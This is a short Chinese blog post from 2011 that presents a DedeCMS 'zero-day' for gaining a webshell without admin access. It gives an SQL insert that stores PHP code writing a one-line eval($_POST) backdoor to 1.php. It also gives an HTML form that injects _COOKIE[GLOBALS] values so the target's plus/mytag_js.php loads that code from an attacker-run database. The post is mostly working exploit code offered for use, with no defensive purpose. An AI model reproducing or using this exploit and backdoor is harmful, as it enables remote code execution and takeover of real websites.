dedecms最新0day利用不进后台直接拿WEBSHELL

分类:安全 | 2011-08-11 | 撸过 223 次
0人扯谈

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞

https://www.webshell.cc/313.html

webshell的方法如下:

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \'<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);

再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

<form id=”QuickSearch” action=”” method=”post” name=”QuickSearch” onsubmit=”addaction();”><input style=”width: 400;” type=”text” name=”doaction” value=”https://www.webshell.cc/plus/mytag_js.php?aid=1” />

<input style=”width: 400;” type=”text” name=”_COOKIE[GLOBALS][cfg_dbhost]” value=”dbhost” />

<input style=”width: 400;” type=”text” name=”_COOKIE[GLOBALS][cfg_dbuser]” value=”dbuser” />

<input style=”width: 400;” type=”text” name=”_COOKIE[GLOBALS][cfg_dbpwd]” value=”dbpwd” />

<input style=”width: 400;” type=”text” name=”_COOKIE[GLOBALS][cfg_dbname]” value=”dbname” />

<input style=”width: 400;” type=”text” name=”_COOKIE[GLOBALS][cfg_dbprefix]” value=”dede_” />

<input style=”width: 400;” type=”text” name=”nocache” value=”true” />
<input type=”submit” name=”QuickSearchBtn” value=”提交” />

</form><script type=”text/javascript”>// <![CDATA[
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
// ]]></script>

本站内容均为原创,转载请务必保留署名与链接!
dedecms最新0day利用不进后台直接拿WEBSHELL:https://www.webshell.cc/318.html
标签: ,

相关日志